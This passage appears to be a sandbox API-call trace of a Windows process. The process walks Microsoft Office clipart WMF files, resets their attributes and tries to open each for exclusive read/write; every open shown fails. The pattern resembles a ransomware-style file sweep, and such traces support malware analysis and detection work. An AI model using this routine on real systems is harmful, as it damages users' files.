files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.923] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.923] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.923] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.923] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.924] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF", dwFileAttributes=0x80) returned 0 [0133.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.924] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.924] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.924] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.924] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.924] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF", dwFileAttributes=0x80) returned 0 [0133.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.924] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.924] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.924] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.924] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.925] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF", dwFileAttributes=0x80) returned 0 [0133.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.926] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.926] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.926] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.926] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.926] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF", dwFileAttributes=0x80) returned 0 [0133.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.926] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.926] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.926] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.926] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.926] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF", dwFileAttributes=0x80) returned 0 [0133.927] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.927] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.927] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.927] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.927] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.927] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF", dwFileAttributes=0x80) returned 0 [0133.927] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.927] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.927] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.927] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.927] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.928] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF", dwFileAttributes=0x80) returned 0 [0133.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.928] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.928] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.928] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.928] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.928] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF", dwFileAttributes=0x80) returned 0 [0133.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.928] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.928] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.928] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.928] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.929] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF", dwFileAttributes=0x80) returned 0 [0133.929] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.929] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.929] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.929] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.930] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.930] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF", dwFileAttributes=0x80) returned 0 [0133.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00078_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00078_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.930] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.930] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.931] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.931] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.931] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF", dwFileAttributes=0x80) returned 0 [0133.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00092_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.931] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.931] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.931] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.931] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.931] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF", dwFileAttributes=0x80) returned 0 [0133.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.931] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.932] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.932] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.932] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.932] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF", dwFileAttributes=0x80) returned 0 [0133.932] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.932] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.932] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.932] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.932] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.932] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF", dwFileAttributes=0x80) returned 0 [0133.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.933] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.933] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.933] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.933] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.933] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF", dwFileAttributes=0x80) returned 0 [0133.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.936] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.936] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.936] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.936] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.936] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF", dwFileAttributes=0x80) returned 0 [0133.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.936] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.936] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.936] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.936] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.937] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF", dwFileAttributes=0x80) returned 0 [0133.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.937] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.937] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.937] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.937] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.937] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF", dwFileAttributes=0x80) returned 0 [0133.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.938] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.938] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.938] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.938] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.938] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF", dwFileAttributes=0x80) returned 0 [0133.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.938] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.938] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.938] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.939] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.939] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF", dwFileAttributes=0x80) returned 0 [0133.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.939] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.939] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.939] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.939] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.939] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF", dwFileAttributes=0x80) returned 0 [0133.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.939] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.939] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.940] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.940] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.940] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF", dwFileAttributes=0x80) returned 0 [0133.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.941] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.941] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.941] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.941] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.941] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF", dwFileAttributes=0x80) returned 0 [0133.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.941] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.941] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.941] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.941] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.941] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF", dwFileAttributes=0x80) returned 0 [0133.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.942] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.942] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.942] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.942] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.942] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF", dwFileAttributes=0x80) returned 0 [0133.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.942] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.942] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.942] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.942] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF", dwFileAttributes=0x80) returned 0 [0133.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.943] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.943] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.943] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.943] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF", dwFileAttributes=0x80) returned 0 [0133.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.944] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.944] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.944] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.944] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.944] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF", dwFileAttributes=0x80) returned 0 [0133.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00445_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.944] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.944] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.945] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.945] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.945] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF", dwFileAttributes=0x80) returned 0 [0133.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.945] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.945] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.945] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.945] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.945] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 